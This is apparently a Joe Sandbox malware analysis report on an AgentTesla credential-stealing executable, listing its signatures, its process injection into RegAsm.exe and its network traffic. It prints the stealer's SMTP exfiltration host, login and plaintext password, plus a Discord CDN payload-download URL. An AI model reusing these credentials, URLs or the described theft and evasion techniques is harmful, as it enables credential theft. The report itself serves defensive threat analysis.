Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
450230549.exe

Overview

General Information

Sample name:450230549.exe
Analysis ID:1519251
MD5:5086980f3ee0c035ec304102e6981410
SHA1:fca1625b36a002d77f69586f96744dfbcde1d472
SHA256:bfcef30ac8c0270957b3126d0b9046ddd4bc67fdffea077dd0a127809aa233a6
Tags:exeuser-lowmal3
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: RegAsm connects to smtp port
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 450230549.exe (PID: 7068 cmdline: "C:\Users\user\Desktop\450230549.exe" MD5: 5086980F3EE0C035EC304102E6981410)
    • RegAsm.exe (PID: 6444 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 5324 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 4136 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.zqamcx.com", "Username": "server1@zqamcx.com", "Password": "Anambraeast@"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3558791115.0000000002925000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000003.00000002.3558791115.0000000002902000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000003.00000002.3558791115.00000000028D5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000002.3558791115.00000000028D5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000003.00000002.3557540735.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 9 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.450230549.exe.385caa0.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.450230549.exe.385caa0.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0.2.450230549.exe.385caa0.1.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x32a43:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x32ab5:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x32b3f:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x32bd1:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x32c3b:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x32cad:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x32d43:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x32dd3:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                3.2.RegAsm.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  3.2.RegAsm.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    Click to see the 20 entries

                    Sigma Signatures

                    Networking

                    barindex
                    Sigma detected: RegAsm connects to smtp port
                    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 78.110.166.82, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 4136, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733

                    Suricata Signatures

                    No Suricata rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 0.2.450230549.exe.385caa0.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.zqamcx.com", "Username": "server1@zqamcx.com", "Password": "Anambraeast@"}
                    Multi AV Scanner detection for submitted file
                    Source: 450230549.exeReversingLabs: Detection: 34%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: 450230549.exeJoe Sandbox ML: detected
                    Source: 450230549.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49731 version: TLS 1.2
                    Source: 450230549.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: HSDSDF32.pdb( source: 450230549.exe
                    Source: Binary string: HSDSDF32.pdb source: 450230549.exe

                    Networking

                    barindex
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.450230549.exe.385caa0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.450230549.exe.37e4e58.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.450230549.exe.3820c80.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: Process Memory Space: 450230549.exe PID: 7068, type: MEMORYSTR
                    Source: global trafficTCP traffic: 192.168.2.4:49733 -> 78.110.166.82:587
                    Source: global trafficHTTP traffic detected: GET /attachments/1288648799220400244/1288752046828425256/kingggggme.txt?ex=66f6535f&is=66f501df&hm=79c31af27b70e67c8e5bccaa49762a5ee024314b22617ea8ae2de8893a0fe97d& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 78.110.166.82 78.110.166.82
                    Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                    Source: Joe Sandbox ViewASN Name: UKSERVERS-ASUKDedicatedServersHostingandCo-Location UKSERVERS-ASUKDedicatedServersHostingandCo-Location
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: ip-api.com
                    Source: global trafficTCP traffic: 192.168.2.4:49733 -> 78.110.166.82:587
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /attachments/1288648799220400244/1288752046828425256/kingggggme.txt?ex=66f6535f&is=66f501df&hm=79c31af27b70e67c8e5bccaa49762a5ee024314b22617ea8ae2de8893a0fe97d& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: mail.zqamcx.com
                    Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
                    Source: 450230549.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: 450230549.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                    Source: 450230549.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: 450230549.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: 450230549.exe, 00000000.00000002.1725521175.0000000002783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com
                    Source: 450230549.exe, 00000000.00000002.1725521175.0000000002783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.comd
                    Source: 450230549.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: 450230549.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                    Source: 450230549.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: 450230549.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: 450230549.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                    Source: RegAsm.exe, 00000003.00000002.3558791115.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: 450230549.exe, 00000000.00000002.1726211238.0000000003709000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3558791115.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3557540735.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: RegAsm.exe, 00000003.00000002.3558791115.0000000002908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.zqamcx.com
                    Source: 450230549.exeString found in binary or memory: http://ocsp.digicert.com0
                    Source: 450230549.exeString found in binary or memory: http://ocsp.digicert.com0A
                    Source: 450230549.exeString found in binary or memory: http://ocsp.digicert.com0C
                    Source: 450230549.exeString found in binary or memory: http://ocsp.digicert.com0X
                    Source: RegAsm.exe, 00000003.00000002.3558791115.0000000002908000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3561320384.0000000005AF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3558363687.0000000000D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0#
                    Source: RegAsm.exe, 00000003.00000002.3558791115.0000000002908000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3561320384.0000000005AF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3558363687.0000000000D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                    Source: 450230549.exe, 00000000.00000002.1725521175.0000000002767000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3558791115.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: 450230549.exeString found in binary or memory: http://www.digicert.com/CPS0
                    Source: RegAsm.exe, 00000003.00000002.3558791115.0000000002908000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3561320384.0000000005AF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3558363687.0000000000D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: RegAsm.exe, 00000003.00000002.3558791115.0000000002908000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3561320384.0000000005AF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3558363687.0000000000D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: RegAsm.exe, 00000003.00000002.3558791115.0000000002908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://zqamcx.com
                    Source: 450230549.exe, 00000000.00000002.1726211238.0000000003709000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3557540735.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: 450230549.exe, 00000000.00000002.1725521175.0000000002767000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
                    Source: 450230549.exeString found in binary or memory: https://cdn.discordapp.com/attachments/1288648799220400244/1288752046828425256/kingggggme.txt?ex=66f
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49731 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.450230549.exe.385caa0.1.raw.unpack, n00.cs.Net Code: MeS
                    Source: 0.2.450230549.exe.37e4e58.0.raw.unpack, n00.cs.Net Code: MeS
                    Source: 0.2.450230549.exe.3820c80.2.raw.unpack, n00.cs.Net Code: MeS
                    Installs a global keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.450230549.exe.385caa0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.450230549.exe.37e4e58.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.450230549.exe.3820c80.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.450230549.exe.385caa0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.450230549.exe.37e4e58.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.450230549.exe.3820c80.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\Desktop\450230549.exeCode function: 0_2_00D311D80_2_00D311D8
                    Source: C:\Users\user\Desktop\450230549.exeCode function: 0_2_00D32B280_2_00D32B28
                    Source: C:\Users\user\Desktop\450230549.exeCode function: 0_2_00D32B190_2_00D32B19
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00EAB3033_2_00EAB303
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00EA4BE83_2_00EA4BE8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00EAEE483_2_00EAEE48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00EA3FD03_2_00EA3FD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00EA43183_2_00EA4318
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_060F21683_2_060F2168
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_060F21633_2_060F2163
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061755903_2_06175590
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061765F83_2_061765F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0617B22A3_2_0617B22A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061730503_2_06173050
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0617C1803_2_0617C180
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06177D803_2_06177D80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061776A03_2_061776A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0617E3983_2_0617E398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061700403_2_06170040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06175CDF3_2_06175CDF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0617001A3_2_0617001A
                    Source: 450230549.exeStatic PE information: invalid certificate
                    Source: 450230549.exe, 00000000.00000002.1722663773.00000000009DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 450230549.exe
                    Source: 450230549.exe, 00000000.00000000.1701465729.00000000003E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHSDSDF32.exe2 vs 450230549.exe
                    Source: 450230549.exe, 00000000.00000002.1726211238.0000000003709000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename823aa2f5-346d-4241-a1e4-da92c87486de.exe4 vs 450230549.exe
                    Source: 450230549.exe, 00000000.00000002.1725521175.00000000027B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename823aa2f5-346d-4241-a1e4-da92c87486de.exe4 vs 450230549.exe
                    Source: 450230549.exeBinary or memory string: OriginalFilenameHSDSDF32.exe2 vs 450230549.exe
                    Source: 450230549.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 0.2.450230549.exe.385caa0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.450230549.exe.37e4e58.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.450230549.exe.3820c80.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.450230549.exe.385caa0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.450230549.exe.37e4e58.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.450230549.exe.3820c80.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 450230549.exe, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
                    Source: 450230549.exe, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
                    Source: 450230549.exe, AesHelper.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.450230549.exe.385caa0.1.raw.unpack, NpXw3kw.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.450230549.exe.385caa0.1.raw.unpack, NpXw3kw.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.450230549.exe.385caa0.1.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.450230549.exe.385caa0.1.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.450230549.exe.385caa0.1.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.450230549.exe.385caa0.1.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.450230549.exe.385caa0.1.raw.unpack, fpnV0Qjz.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.450230549.exe.385caa0.1.raw.unpack, fpnV0Qjz.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@7/1@4/3
                    Source: C:\Users\user\Desktop\450230549.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\450230549.exe.logJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                    Source: 450230549.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 450230549.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 450230549.exeReversingLabs: Detection: 34%
                    Source: unknownProcess created: C:\Users\user\Desktop\450230549.exe "C:\Users\user\Desktop\450230549.exe"
                    Source: C:\Users\user\Desktop\450230549.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Users\user\Desktop\450230549.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Users\user\Desktop\450230549.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Users\user\Desktop\450230549.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: msasn1.dllJump to behavior
